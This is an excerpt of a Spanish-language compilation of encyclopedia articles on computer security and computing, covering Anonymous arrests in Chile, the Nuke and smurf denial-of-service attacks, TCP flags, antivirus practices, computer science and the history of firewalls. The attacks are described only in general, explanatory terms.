Arrestos en Chile6 presuntos integrantes de Anonymous fueron localizados y arrestados por la Policía de Investigaciones de Chile(PDI), ya que se relacionaban con los ataques del grupo de hackers activistas.La PDI declaro: "En cooordinación con Interpol, partimos de la operación Exposure realizando varias diligenciaspoliciacas desarticulando al grupo Anonymous Chile". El grupo detenido fue puesto a disposición por la PDInombrados "presuntos responsables de ataques DDoS en páginas web de partidos políticos, instituciones yempresas", con edades de 17 años 2 de ellos y la otra parte entre 20 y 35 años de edad viviendo en varías partes delestado y precisando la PDI que son parte del grupo Anonymous.El fiscal de la unidad de Delitos de AltaComplejidad, Marco Mercado exclamo que la condena a estos actos va entre 5 años y 541 días en la cárcel. En ladetención se obtuvieron Discos duros externos, computadoras y otras unidades de almacenamiento las cuales estánsiendo investigadas por detectives de la brigada Ciber-Crimen en la institución de la policía Chilena.Varios de estos arrestos son hechos por la operación internacional Exposure contra ciberdelitos coordinada por laInterpol con 25 arrestos en España, agregando en arrestos a 10 personas más en Argentina y 5 en Colombia y todosson parte del grupo Anonymous[22]

Referencias• Félix Stalder, "Anonymous, la protesta enmascarada [23]". Le Monde Diplomatique, febrero de 2012[1] http:/ / anonplus. com/[2] http:/ / anonops. blogspot. com/[3] Somos Anonymous, reportaje (http:/ / www. elpais. com/ articulo/ reportajes/ Somos/ Anonymous/ elpepusocdmg/ 20110116elpdmgrep_1/

Tes), 16/1/2011, El País[10] answerbag (http:/ / www. answerbag. com/ q_view/ 872606)[11] Serious Business (http:/ / www. citypaper. com/ columns/ story. asp?id=15543)[12] Facebook cierra la cuenta del grupo de ciberactivistas defensores de Wikileaks, El País, 9/12/2010 (http:/ / www. elpais. com/ articulo/

internacional/ Facebook/ cierra/ cuenta/ grupo/ ciberactivistas/ defensores/ Wikileaks/ elpepuint/ 20101209elpepuint_11/Tes#EnlaceComentarios)

[13] Operation Black Out – April 18, 2011 (http:/ / www. youtube. com/ watch?v=npZ6SeWJR_I& ) (vídeo borrado por infligir los Términos deUso de Google)

[14] The Inquirer; Youtube is accused of silencing Anonymous (http:/ / www. theinquirer. net/ inquirer/ news/ 2044793/youtube-accused-silencing-anonymous?WT. rss_f=& WT. rss_a=Youtube+ is+ accused+ of+ silencing+ Anonymous) 17 de abril de 2011.

[15] http:/ / derecho-internet. org/ node/ 56[16] Los detenidos de Anonymous se enfrentan a una pena de uno a tres años de cárcel (http:/ / www. europapress. es/ comunitat-valenciana/

noticia-detenidos-anonymous-enfrentan-pena-tres-anos-carcel-20110610153631. html)[19] http:/ / www. policia. es[20] Anonymous tumba la web de la Policía en respuesta a las detenciones (http:/ / www. rtve. es/ noticias/ 20110612/

anonymous-tumba-web-policia-respuesta-detenciones/ 439337. shtml)[21] (http:/ / www. tabascohoy. com/ noticia. php?id_nota=237170),Operación Exposure.[22] (http:/ / ecodiario. eleconomista. es/ internacional/ noticias/ 3782785/ 02/ 12/

Redada-contra-Anonymous-25-detenidos-en-Espana-y-Latinoamerica. html), Arrestos contra Anonymous.[23] http:/ / dviglione. blogspot. com. es/ 2012/ 02/ anonymous-la-protesta-enmascarada-le. html

Enlaces externos• Wikimedia Commons alberga contenido multimedia sobre Anonymous. Commons• Wikiquote alberga frases célebres de o sobre Anonymous. Wikiquote• Wikinoticias tiene noticias relacionadas con Anonymous.Wikinoticias• Anonymous Operations (http:/ / www. anonops. net), Sitio web en inglés de AnonOps, sitio que concentra la

mayoría de las operaciones en curso.• Anonymous: los enemigos de los enemigos de Wikileaks (http:/ / blogs. elpais. com/ trending-topics/ 2010/ 12/

quien-es-anonymous. html), El País, 8/12/2010.

Page 29: Virus informático

Anonymous 27

• Somos Anonymous (http:/ / www. elpais. com/ articulo/ reportajes/ Somos/ Anonymous/ elpepusocdmg/20110116elpdmgrep_1/ Tes), El País, 16/01/2011.

• Anonymous: de excéntricos bromistas a justicieros cibernéticos (http:/ / www. m-x. com. mx/ xml/ pdf/ 248/ 40.pdf), Emeequis, 2/20/2011.

NukeUn Nuke (no confundir con WinNuke), es un viejo ataque de denegación de servicio contra redes de computadoras.

¿Qué es un ataque de Nuke?Dicho ataque consiste en enviar paquetes de datos ICMP fragmentados o de alguna otra forma inválidos a unobjetivo, lo que se consigue usando una herramienta de ping modificada para enviar estos datos corruptos una y otravez, ralentizando la computadora afectada hasta que deje de funcionar. En los juegos en línea, "nukear" es mandarmensajes uno tras del otro a uno o varios usuarios, en rápida sucesión, que contienen texto al azar. Dichas técnicastambién se ven en programas de mensajería instantánea ya que el texto repetido puede ser asignado a una macro oAppleScript. Hoy en día, los sistemas operativos modernos son resistentes a esas técnicas, y la mayoría de los juegosen línea traen "control de inundación" (flood control).

Nuke en la escena de warezOtra definición de Nuke es la que se usa en la escena del warez. Un programa lanzado como warez es "nukeado" porotros grupos o individuos si, por ejemplo, no se puede instalar, no funciona como se espera o tiene información falsa.El grupo que lo lanzó puede también "nukearlo" si publican otra versión nueva (que sí funcione).

Page 30: Virus informático

Flags 28

FlagsEl campo Flags en un protocolo de comunicaciones TCP utiliza 6 bits para activar o desactivar cada una de lassiguientes funciones:• URG: Especifica a la máquina receptora la existencia de información urgente en el flujo de datos.• ACK: Se corresponde con una respuesta de correcta recepción de un paquete anterior que se envió a otra

máquina.• PSH: Indica a la máquina receptora que debe pasar la información a la capa de aplicación (programas) lo más

rápido posible.• Flag RST: Especifica el reinicio de la conexión entre la máquina receptora y la emisora.• SYN: Se utiliza para la sincronización de números de secuencia entre máquinas.• FIN: Indica que debe empezar el proceso de fin de conexión.

Ataque smurfEl ataque smurf es un ataque de denegación de servicio que utiliza mensajes de ping al broadcast con spoofing parainundar (flood) un objetivo (sistema atacado).En este tipo de ataque, el perpetrador envia grandes cantidades de tráfico ICMP (ping) a la dirección de broadcast,todos ellos teniendo la dirección de origen cambiada (spoofing) a la dirección de la víctima. Si el dispositivo de ruteoenvía el tráfico a esas direcciones de broadcast lo hace en capa 2 donde está la función de broadcast, y la mayoría delos host tomarán los mensajes ICMP de echo request y lo responderán, multiplicando el tráfico por cada host de lasubred. En las redes que ofrecen múltiples accessos a broadcast, potencialmente miles de máquinas responderán acada paquete. Todas esas respuestas vuelven a la IP de origen (la IP de la víctima atacada).Algunos años atrás, todas las redes enrutaban ataques smurf -- en la jerga se dice que eran "smurfeables" -- Hoy día,la mayoría de los administradores han inmunizado sus redes contra estos abusos, aunque muchas redes permanecensmurfeables.Para asegurar una red que disponga de enrutadores Cisco es tan simple como correr el comando no ipdirected-broadcast.Smurfs hace referencia a los personajes de ficción Los Pitufos.

Enlaces externos• Noticia oficial del CERRT sobre ataques DoS de Smurf [1]

• Lo último en ataques de denegación de servicio: "Smurfing" Descripción e información para minimizar efectos [2]

• Definición de Smurf [3]

• Ataques Dos en Unix. Recomendaciones generales del Stack IP [4]

• Definición de ataques Smurf, Ataques Fraggle, Spoofing, Ataques SYN [5]

Page 31: Virus informático

Ataque smurf 29

Referencias[1] http:/ / www. cert. org/ advisories/ CA-1998-01. html[2] http:/ / www. pentics. net/ denial-of-service/ presentations/ 19971027_smurf_files/ frame. htm[3] http:/ / searchsecurity. techtarget. com/ sDefinition/ 0,,sid14_gci213013,00. html[4] http:/ / www. unixcities. com/ dos-attack/ index. html[5] http:/ / www. unixcities. com/ dos-attack/ index1. html

AntivirusEn informática los antivirus son programas cuyo objetivo es detectar y/o eliminar virus informáticos. Nacierondurante la década de 1980.Con el transcurso del tiempo, la aparición de sistemas operativos más avanzados e Internet, ha hecho que losantivirus hayan evolucionado hacia programas más avanzados que no sólo buscan detectar virus informáticos, sinobloquearlos, desinfectarlos y prevenir una infección de los mismos, y actualmente ya son capaces de reconocer otrostipos de malware, como spyware, rootkits, etc.

Métodos de contagioExisten dos grandes grupos de propagación: los virus cuya instalación el usuario en un momento dado ejecuta oacepta de forma inadvertida, o los gusanos, con los que el programa malicioso actúa replicándose a través de lasredes.En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientosanómalos o no previstos. Dichos comportamientos son los que dan la traza del problema y tienen que permitir larecuperación del mismo.Dentro de las contaminaciones más frecuentes por interacción del usuario están las siguientes:•• Mensajes que ejecutan automáticamente programas (como el programa de correo que abre directamente un

archivo adjunto).•• Ingeniería social, mensajes como: «Ejecute este programa y gane un premio».•• Entrada de información en discos de otros usuarios infectados.• Instalación de software que pueda contener uno o varios programas maliciosos.• Unidades extraíbles de almacenamiento (USB).

Seguridad y métodos de protecciónLos métodos para contener o reducir los riesgos asociados a los virus pueden ser los denominados activos o pasivos.

Tipos de vacunas• Sólo detección: Son vacunas que sólo actualizan archivos infectados sin embargo no pueden eliminarlos o

desinfectarlos.• Detección y desinfección: son vacunas que detectan archivos infectados y que pueden desinfectarlos.• Detección y aborto de la acción: son vacunas que detectan archivos infectados y detienen las acciones que causa

el virus.• Comparación por firmas: son vacunas que comparan las firmas de archivos sospechosos para saber si están

infectados.• Comparación de firmas de archivo: son vacunas que comparan las firmas de los atributos guardados en tu

equipo.

Page 32: Virus informático

Antivirus 30

• Por métodos heurísticos: son vacunas que usan métodos heurísticos para comparar archivos.• Invocado por el usuario: son vacunas que se activan instantáneamente con el usuario.• Invocado por la actividad del sistema: son vacunas que se activan instantáneamente por la actividad del sistema

operativo.

Copias de seguridad (pasivo)Mantener una política de copias de seguridad garantiza la recuperación de los datos y la respuesta cuando nada de loanterior ha funcionado.Asimismo las empresas deberían disponer de un plan y detalle de todo el software instalado para tener un plan decontingencia en caso de problemas.

PlanificaciónLa planificación consiste en tener preparado un plan de contingencia en caso de que una emergencia de virus seproduzca, así como disponer al personal de la formación adecuada para reducir al máximo las acciones que puedanpresentar cualquier tipo de riesgo. Cada antivirus puede planear la defensa de una manera, es decir, un antiviruspuede hacer un escaneado completo, rápido o de vulnerabilidad según elija el usuario.

Consideraciones de softwareEl software es otro de los elementos clave en la parte de planificación. Se debería tener en cuenta la siguiente lista decomprobaciones para tu seguridad:1. Tener el software imprescindible para el funcionamiento de la actividad, nunca menos pero tampoco más. Tener

controlado al personal en cuanto a la instalación de software es una medida que va implícita. Asimismo tenercontrolado el software asegura la calidad de la procedencia del mismo (no debería permitirse software pirata o singarantías). En todo caso un inventario de software proporciona un método correcto de asegurar la reinstalación encaso de desastre.

2.2. Disponer del software de seguridad adecuado. Cada actividad, forma de trabajo y métodos de conexión a Internetrequieren una medida diferente de aproximación al problema. En general, las soluciones domésticas, dondeúnicamente hay un equipo expuesto, no son las mismas que las soluciones empresariales.

3.3. Métodos de instalación rápidos. Para permitir la reinstalación rápida en caso de contingencia.4.4. Asegurar licencias. Determinados softwares imponen métodos de instalación de una vez, que dificultan la

reinstalación rápida de la red. Dichos programas no siempre tienen alternativas pero ha de buscarse con elfabricante métodos rápidos de instalación.

5.5. Buscar alternativas más seguras. Existe software que es famoso por la cantidad de agujeros de seguridad queintroduce. Es imprescindible conocer si se puede encontrar una alternativa que proporcione igualesfuncionalidades pero permitiendo una seguridad extra.

Page 33: Virus informático

Antivirus 31

Consideraciones de la redDisponer de una visión clara del funcionamiento de la red permite poner puntos de verificación filtrado y detecciónahí donde la incidencia es más claramente identificable. Sin perder de vista otros puntos de acción es conveniente:1.1. Mantener al máximo el número de recursos de red en modo de sólo lectura. De esta forma se impide que

computadoras infectadas los propaguen.2.2. Centralizar los datos. De forma que detectores de virus en modo batch puedan trabajar durante la noche.3.3. Realizar filtrados de firewall de red. Eliminar los programas que comparten datos, como pueden ser los P2P;

Mantener esta política de forma rigurosa, y con el consentimiento de la gerencia.4.4. Reducir los permisos de los usuarios al mínimo, de modo que sólo permitan el trabajo diario.5.5. Controlar y monitorizar el acceso a Internet. Para poder detectar en fases de recuperación cómo se ha introducido

el virus, y así determinar los pasos a seguir.

Formación: Del usuario

Esta es la primera barrera de protección de la red.

AntivirusEs conveniente disponer de una licencia activa de antivirus. Dicha licencia se empleará para la generación de discosde recuperación y emergencia. Sin embargo no se recomienda en una red el uso continuo de antivirus.El motivo radica en la cantidad de recursos que dichos programas obtienen del sistema, reduciendo el valor de lasinversiones en hardware realizadas.Aunque si los recursos son suficientes, este extra de seguridad puede ser muy útil.Sin embargo los filtros de correos con detectores de virus son imprescindibles, ya que de esta forma se asegurará unareducción importante de elecciones de usuarios no entrenados que pueden poner en riesgo la red.Los virus más comunes son los troyanos y gusanos, los cuales ocultan tu información, creando Accesos Directos.

FirewallsFiltrar contenidos y puntos de acceso. Eliminar programas que no estén relacionados con la actividad. Tenermonitorizado los accesos de los usuarios a la red, permite asimismo reducir la instalación de software que no esnecesario o que puede generar riesgo para la continuidad del negocio. Su significado es barrera de fuego y nopermite que otra persona no autorizada tenga acceso desde otro equipo al tuyo.

Reemplazo de softwareLos puntos de entrada en la red la mayoría de las veces son el correo, las páginas WEB, y la entrada de ficherosdesde discos, o de computadoras que no están en la empresa (portátiles...)Muchas de estas computadoras emplean programas que pueden ser reemplazados por alternativas más seguras.Es conveniente llevar un seguimiento de cómo distribuyen bancos, y externos el software, valorar su utilidad.

Page 34: Virus informático

Antivirus 32

Centralización y backupLa centralización de recursos y garantizar el backup de los datos es otra de las pautas fundamentales en la política deseguridad recomendada.La generación de inventarios de software, centralización del mismo y la capacidad de generar instalaciones rápidasproporcionan métodos adicionales de seguridad.Es importante tener localizado donde tenemos localizada la información en la empresa. De esta forma podemosrealizar las copias de seguridad de forma adecuada.Control o separación de la informática móvil, dado que esta está más expuesta a las contingencias de virus.

Empleo de sistemas operativos más segurosPara servir ficheros no es conveniente disponer de los mismos sistemas operativos que se emplean dentro de lasestaciones de trabajo, ya que toda la red en este caso está expuesta a los mismos retos. Una forma de prevenirproblemas es disponer de sistemas operativos con arquitecturas diferentes, que permitan garantizar la continuidad denegocio.

Temas acerca de la seguridadExisten ideas instaladas por parte de las empresas de antivirus parte en la cultura popular que no ayudan a mantenerla seguridad de los sistemas de información.• Mi sistema no es importante para un cracker. Este tema se basa en la idea de que no introducir passwords

seguras en una empresa no entraña riesgos pues ¿Quién va a querer obtener información mía? Sin embargo dadoque los métodos de contagio se realizan por medio de programas automáticos, desde unas máquinas a otras, estosno distinguen buenos de malos, interesantes de no interesantes... Por tanto abrir sistemas y dejarlos sin claves esfacilitar la vida a los virus.

• Estoy protegido pues no abro archivos que no conozco. Esto es falso, pues existen múltiples formas decontagio, además los programas realizan acciones sin la supervisión del usuario poniendo en riesgo los sistemas.

• Como tengo antivirus estoy protegido. Únicamente estoy protegido mientras el antivirus sepa a lo que seenfrenta y como combatirlo. En general los programas antivirus no son capaces de detectar todas las posiblesformas de contagio existentes, ni las nuevas que pudieran aparecer conforme las computadoras aumenten lascapacidades de comunicación.

• Como dispongo de un firewall no me contagio. Esto únicamente proporciona una limitada capacidad derespuesta. Las formas de infectarse en una red son múltiples. Unas provienen directamente de accesos a misistema (de lo que protege un firewall) y otras de conexiones que realizó (de las que no me protege). Emplearusuarios con altos privilegios para realizar conexiones tampoco ayuda.

• Tengo un servidor web cuyo sistema operativo es un UNIX actualizado a la fecha. Puede que este protegidocontra ataques directamente hacia el núcleo, pero si alguna de las aplicaciones web (PHP, Perl, Cpanel, etc.) estádesactualizada, un ataque sobre algún script de dicha aplicación puede permitir que el atacante abra una shell ypor ende ejecutar comandos en el UNIX.

Sistemas operativos más atacadosLas plataformas más atacadas por virus informáticos son la línea de sistemas operativos Windows de Microsoft.Respecto a los sistemas derivados de Unix como GNU/Linux, BSD, Solaris, Mac OS X, estos han corrido con mayorsuerte debido en parte al sistema de permisos. No obstante en las plataformas derivadas de Unix han existido algunosintentos que más que presentarse como amenazas reales no han logrado el grado de daño que causa un virus enplataformas Windows.

Page 35: Virus informático

Antivirus 33

Plataformas Unix, inmunes a los virus de WindowsUn virus informático sólo atacará la plataforma para la que fue desarrollado.

Referencias

Enlaces externos• Microsoft: Ayuda y soporte técnico - Lista de proveedores de software antivirus (http:/ / www. microsoft. com/

windows/ antivirus-partners/ windows-7. aspx)• Centro de Respuesta a Incidentes de Seguridad (Información actualizada sobre todas las amenazas que circulan

por la red) del Gobierno de España - Software antivirus (http:/ / cert. inteco. es/ software/ Proteccion/utiles_gratuitos/ )

Ciencias de la computaciónLas ciencias de la computación o ciencias computacionales son aquellas que abarcan las bases teóricas de lainformación y la computación, así como su aplicación en sistemas computacionales.[1][2][3] Existen diversos camposo disciplinas dentro de las ciencias de la computación o ciencias computacionales; algunos resaltan los resultadosespecíficos del cómputo (como los gráficos por computadora), mientras que otros (como la teoría de la complejidadcomputacional) se relacionan con propiedades de los algoritmos usados al realizar cómputos y otros se enfocan enlos problemas que requieren la implementación de cómputos. Por ejemplo, los estudios de la teoría de lenguajes deprogramación describen un cómputo, mientras que la programación de computadoras aplica lenguajes deprogramación específicos para desarrollar una solución a un problema computacional específico.La informática se refiere al tratamiento automatizado de la información de una forma útil y oportuna. No se debeconfundir el carácter teórico de esta ciencia con otros aspectos prácticos como el uso de Internet.Según Peter J. Denning, la cuestión fundamental en que se basa la ciencia de la computación es: "¿Qué puede ser(eficientemente) automatizado?".[]

HistoriaLa historia de la ciencia de la computación antecede a la invención del computador digital moderno. Antes de ladécada de 1920, el término computador se refería a un ser humano que realizaba cálculos.[] Los primerosinvestigadores en lo que después se convertiría las ciencias de la computación estaban interesados en la cuestión dela computabilidad: qué cosas pueden ser computadas por un ser humano que simplemente siga una lista deinstrucciones con lápiz y papel, durante el tiempo que sea necesario, con ingenuidad y sin conocimiento previo delproblema. Parte de la motivación para este trabajo era el desarrollar máquinas que computaran y que pudieranautomatizar el tedioso y falible trabajo de la computación humana.

Durante la década de 1940, conforme se desarrollaban nuevas y más poderosas máquinas para computar, el términocomputador se comenzó a utilizar para referirse a las máquinas y ya no a sus antecesores humanos. Conforme ibaquedando claro que las computadoras podían usarse para más cosas que solamente cálculos matemáticos, el campode la ciencia de la computación se fue ampliando para estudiar a la computación (informática) en general. La cienciade la computación comenzó entonces a establecerse como una disciplina académica en la década de 1960, con lacreación de los primeros departamentos de ciencia de la computación y los primeros programas de licenciatura(Denning 2000).

Page 36: Virus informático

Ciencias de la computación 34

Campos de las ciencias de la computación

Fundamentos matemáticosCriptografía

Consta de algoritmos para proteger datos privados, incluido el cifrado.Teoría de grafos

Recursos elementales para las estructuras de almacenamiento de datos y para los algoritmos de búsqueda.Lógica matemática

La lógica matemática estudia los sistemas formales en relación con el modo en el que se codifican nocionesintuitivas de objetos matemáticos como conjuntos, números, demostraciones y computación.

Teoría de tiposAnálisis formal de los tipos de datos y el uso de estos para entender las propiedades de los programas, enparticular la seguridad de estos.

Teoría de la computaciónTeoría de la computaciónTeoría de autómatasTeoría de la computabilidadTeoría de la complejidad computacional

Límites fundamentales (en especial de espacio en memoria y tiempo) de los cómputos.

Algoritmos y estructuras de datosAnálisis de algoritmosAlgoritmos

procesos formales usados para los cómputos, y eficiencia de estos procesos.Estructuras de datos

organización y manipulación de los datosLógica y computabilidad

estudio de diferentes tipos de lógicas, su poder expresivo, decidibilidad, aplicaciones.Especificación

desarrollo de métodos para definir formalmente (matemática y lógicamente) el comportamiento esperado deun algoritmo, para luego probar terminación y correctitud.

Page 37: Virus informático

Ciencias de la computación 35

Lenguajes de programación y compiladoresCompiladores

formas de traducir programas computacionales, usualmente a partir de lenguajes de alto nivel a lenguajes debajo nivel.

Teoría de lenguajes de programaciónlenguajes formales para expresar algoritmos y las propiedades de estos lenguajes.

Bases de datosBases de datosEstructura de datosMinería de datos

estudio de algoritmos para buscar y procesar información en documentos y bases de datos; muy relacionadacon la adquisición de información.

Sistemas concurrentes, paralelos y distribuidosProgramación concurrente

teoría y práctica de cómputos simultáneos y computación interactiva.Redes de computadoras

algoritmos y protocolos para comunicar eficientemente datos a través de largas distancias, incluye también lacorrección de errores.

Cómputo paralelocomputación con el uso de múltiples computadoras y múltiples procesadores en paralelo.

Sistemas distribuidossistemas que utilizan múltiples procesadores repartidos en una gran área geográfica.

Inteligencia artificialInteligencia artificial (IA)

la implementación y estudio de sistemas que exhiben (ya sea por su comportamiento o aparentemente) unainteligencia autónoma o comportamiento propio, a veces inspirado por las características de los seres vivos.Las ciencias de la computación están relacionadas con la IA, ya que el software y las computadoras sonherramientas básicas para su desarrollo y progreso.

Razonamiento automatizadoRobótica

algoritmos para controlar el comportamiento de los robots.Visión por computador

algoritmos para extraer objetos tridimensionales de una imagen bidimensional.Aprendizaje automático

Page 38: Virus informático

Ciencias de la computación 36

Gráficos por computadorComputación gráfica

algoritmos tanto para generar sintéticamente imágenes visuales como para integrar o alterar la informaciónvisual y espacial tomada del mundo real.

Procesamiento digital de imágenespor ejemplo, para sensores remotos.

Geometría computacionalpor ejemplo, algoritmos veloces para seleccionar solo los puntos visibles en un poliedro visto desde ciertoángulo, usado en motores 3D.

Computación científicaBioinformáticaComputación cuántica

Paradigma de computación basado en la mecánica cuánticaNeurociencia computacional

Relación con otros camposPor ser una disciplina reciente, existen varias definiciones alternativas para la ciencia de la computación. Esta puedeser vista como una forma de ciencia, matemáticas o una nueva disciplina que no puede ser categorizada siguiendo losmodelos actuales.Las ciencias de la computación frecuentemente se cruzan con otras áreas de investigación, tales como la física y lalingüística. Pero es con las matemáticas con las que se considera que tiene un grado mayor de relación. Eso esevidenciado por el hecho de que los primeros trabajos en el área fueran fuertemente influenciados por matemáticoscomo Kurt Gödel y Alan Turing. En la actualidad sigue habiendo un intercambio de ideas útil entre ambos camposen áreas como la lógica matemática, la teoría de categorías, la teoría de dominios, el álgebra y la geometría.Otro punto a destacar es que, a pesar de su nombre, las ciencias de la computación raramente involucran el estudiomismo de las máquinas conocidas como computadoras. De hecho, el renombrado científico Edsger Dijkstra es muycitado por la frase "Las ciencias de la computación están tan poco relacionadas con las computadoras como laastronomía con los telescopios."

Debido a esto, se propuso buscar un nombre definido para esta ciencia emergente, que evitara la relación con lascomputadoras.Una primera propuesta fue la de Peter Naur, que acuñó el término datología, para reflejar el hecho de que la nuevadisciplina se ocupaba fundamentalmente del tratamiento de los datos, independientemente de las herramientas dedicho tratamiento, fueran computadoras o artificios matemáticos. La primera institución científica en adoptar ladenominación fue el Departamento de Datología de la Universidad de Copenhague, fundado en 1969, y fue el propioPeter Naur el primer profesor de datología. Esta denominación se utiliza principalmente en los países escandinavos.Asimismo, en los primeros momentos, un gran número de términos aparecieron asociados a los practicantes de lacomputación. En esta lista se pueden ver los sugeridos en las revistas y comunicados de la Association for ComputerMachinery: turingeniero, turologista, hombre de los diagramas de flujo (flow-charts-man), metamatemático aplicadoy epistemólogo aplicado.Tres meses más tarde se sugirió el término contólogo, seguido de hipólogo al año siguiente. También se sugirió eltérmino compútica para la disciplina. Informática era, sin embargo, el término más frecuentemente usado en todaEuropa.

Page 39: Virus informático

Ciencias de la computación 37

El diseño y desarrollo de computadoras y sistemas computacionales generalmente se considera un campo reclamadopor disciplinas ajenas a las ciencias de la computación. Por ejemplo, el estudio del hardware suele considerarse partede la ingeniería informática, mientras que el estudio de sistemas computacionales comerciales y su desarrollo suelendenominarse tecnologías de la información (TI) o sistemas de información. Sin embargo, hay una estrechacomunicación de ideas entre las distintas disciplinas relacionadas con las computadoras.La ciencia de la computación a menudo recibe críticas desde otros estamentos que la consideran escasamenterigurosa y científica. Esta opinión se plasma en la expresión: "La ciencia es a las ciencias de la computación comola hidrodinámica a la fontanería", atribuida a Stan Kelly-Bootle y otros afines.

La investigación en ciencias de la computación también suele relacionarse con otras disciplinas, como la cienciacognitiva, la física (véase computación cuántica), la lingüística, etcétera.La relación entre las ciencias de la computación y la ingeniería de software es un tema muy discutido, por disputassobre lo que realmente significa el término ingeniería de software y sobre cómo se define a las ciencias de lacomputación. Algunas personas creen que la ingeniería de software sería un subconjunto de las ciencias de lacomputación. Otras, tomando en cuenta la relación entre otras disciplinas científicas y de la ingeniería, creen que elprincipal objetivo de las ciencias de la computación sería estudiar las propiedades del cómputo en general, mientrasque el objetivo de la ingeniería de software sería diseñar cómputos específicos para lograr objetivos prácticos, con loque se convertiría en disciplinas diferentes. Este punto de vista es el que sostiene, por ejemplo, Parnas (1998).Incluso hay otros que sostienen que no podría existir una ingeniería de software.Los aspectos académicos, políticos y de financiamiento en las áreas de ciencias de la computación tienden a verseinfluidos drásticamente por el criterio del departamento encargado de la investigación y la educación en cadauniversidad, que puede estar orientado a la matemática o a la ingeniería.Los departamentos de ciencias de la computación orientados a la matemática suelen alinearse del lado de lacomputación científica y las aplicaciones de cálculo numérico.El término computación científica, que no debe confundirse con ciencia de la computación, designa a todas aquellasprácticas destinadas a modelar, plantear experimentos y validar teorías científicas sirviéndose de medioscomputacionales. En estos casos la computación es una mera herramienta y el esfuerzo se dirige a avanzar en loscampos objetivo (física, biología, mecánica de fluidos, radiotransmisión,...), más que en la propia ciencia de lacomputación.Finalmente, el público en general algunas veces confunde la ciencia de la computación con áreas vocacionales quetrabajan con computadoras o piensan que trata acerca de su propia experiencia con las computadoras, lo cual sueleincluir actividades como los juegos, la navegación web y el procesamiento de texto. Sin embargo, el punto central dela ciencia de la computación va más allá de entender las propiedades de los programas que se emplean paraimplementar aplicaciones de software como juegos y navegadores web, y utiliza ese entendimiento para crear nuevosprogramas o mejorar los existentes.[4]

Page 40: Virus informático

Ciencias de la computación 38

Referencias[1] "Computer science is the study of information" Department of Computer and Information Science (http:/ / www. njit. edu/ v2/ archivecatalog/

undergraduate/ 91/ 19-und. html), Guttenberg Information Technologies[2] "Computer science is the study of computation." Computer Science Department, College of Saint Benedict (http:/ / www. csbsju. edu/

computerscience/ curriculum), Saint John's University[3] "Computer Science is the study of all aspects of computer systems, from the theoretical foundations to the very practical aspects of managing

large software projects." Massey University (http:/ / study. massey. ac. nz/ major. asp?major_code=2010& prog_code=93068)[4] "Common myths and preconceptions about Cambridge Computer Science" Computer Science Department (http:/ / www. cl. cam. ac. uk/

admissions/ undergraduate/ myths/ ), University of Cambridge

Bibliografía• Abelson, H. y Sussman, G.J. con Sussman, J. (1996). Structure and Interpretation of Computer Programs, 2nd

Ed.. EUA: MIT Press. ISBN 0-262-01153-0.• Constable, R. L. (1997). "Nature of the Information Sciences" (http:/ / www. cs. cornell. edu/ cis-dean/ Nature.

pdf).• Constable, R. L. (2000, marzo). "Computer Science: Achievements and Challenges circa 2000" (http:/ / www. cs.

cornell. edu/ cis-dean/ bgu. pdf).• Parnas, D. L. (1998). Software Engineering Programmes are not Computer Science Programmes.

Enlaces externos• Wikimedia Commons alberga contenido multimedia sobre Ciencias de la computación. Commons• Wikiversidad alberga proyectos de aprendizaje sobre Ciencias de la computación.Wikiversidad

Cortafuegos (informática)

Esquema de donde se localizaría un cortafuegos en una red de ordenadores.

Un cortafuegos (firewall en inglés) es unaparte de un sistema o una red que estádiseñada para bloquear el acceso noautorizado, permitiendo al mismo tiempocomunicaciones autorizadas.

Se trata de un dispositivo o conjunto dedispositivos configurados para permitir,limitar, cifrar, descifrar, el tráfico entre losdiferentes ámbitos sobre la base de unconjunto de normas y otros criterios.Los cortafuegos pueden ser implementadosen hardware o software, o una combinaciónde ambos. Los cortafuegos se utilizan con frecuencia para evitar que los usuarios de Internet no autorizados tenganacceso a redes privadas conectadas a Internet, especialmente intranets. Todos los mensajes que entren o salgan de laintranet pasan a través del cortafuegos, que examina cada

Page 41: Virus informático

Cortafuegos (informática) 39

Un ejemplo de una interfaz de usuario para un cortafuegos en Ubuntu

mensaje y bloquea aquellos que no cumplenlos criterios de seguridad especificados.También es frecuente conectar alcortafuegos a una tercera red, llamada «zonadesmilitarizada» o DMZ, en la que seubican los servidores de la organizaciónque deben permanecer accesibles desde lared exterior.

Un cortafuegos correctamente configuradoañade una protección necesaria a la red, peroque en ningún caso debe considerarsesuficiente. La seguridad informática abarcamás ámbitos y más niveles de trabajo yprotección.

Historia del cortafuegos

El término firewall / fireblock significabaoriginalmente una pared para confinar unincendio o riesgo potencial de incendio enun edificio. Más adelante se usa parareferirse a las estructuras similares, como lahoja de metal que separa el compartimiento del motor de un vehículo o una aeronave de la cabina. La tecnología delos cortafuegos surgió a finales de 1980, cuando Internet era una tecnología bastante nueva en cuanto a su uso globaly la conectividad. Los predecesores de los cortafuegos para la seguridad de la red fueron los routers utilizados afinales de 1980, que mantenían a las redes separadas unas de otras. La visión de Internet como una comunidadrelativamente pequeña de usuarios con máquinas compatibles, que valoraba la predisposición para el intercambio yla colaboración, terminó con una serie de importantes violaciones de seguridad de Internet que se produjo a finalesde los 80:[]

• Clifford Stoll, que descubrió la forma de manipular el sistema de espionaje alemán.[]

• Bill Cheswick, cuando en 1992 instaló una cárcel simple electrónica para observar a un atacante.[]

• En 1988, un empleado del Centro de Investigación Ames de la NASA, en California, envió una nota por correoelectrónico a sus colegas[1] que decía:

"Estamos bajo el ataque de un virus de Internet! Ha llegado a Berkeley, UC San Diego, Lawrence Livermore,Stanford y la NASA Ames."

• El Gusano Morris, que se extendió a través de múltiples vulnerabilidades en las máquinas de la época. Aunque noera malicioso, el gusano Morris fue el primer ataque a gran escala sobre la seguridad en Internet; la red noesperaba ni estaba preparada para hacer frente a su ataque.[2]

Primera generación – cortafuegos de red: filtrado de paquetesEl primer documento publicado para la tecnología firewall data de 1988, cuando el equipo de ingenieros DigitalEquipment Corporation (DEC) desarrolló los sistemas de filtro conocidos como cortafuegos de filtrado de paquetes.Este sistema, bastante básico, fue la primera generación de lo que se convertiría en una característica más técnica yevolucionada de la seguridad de Internet. En AT&T Bell, Bill Cheswick y Steve Bellovin, continuaban susinvestigaciones en el filtrado de paquetes y desarrollaron un modelo de trabajo para su propia empresa, con base ensu arquitectura original de la primera generación.[3]

Page 42: Virus informático

Cortafuegos (informática) 40

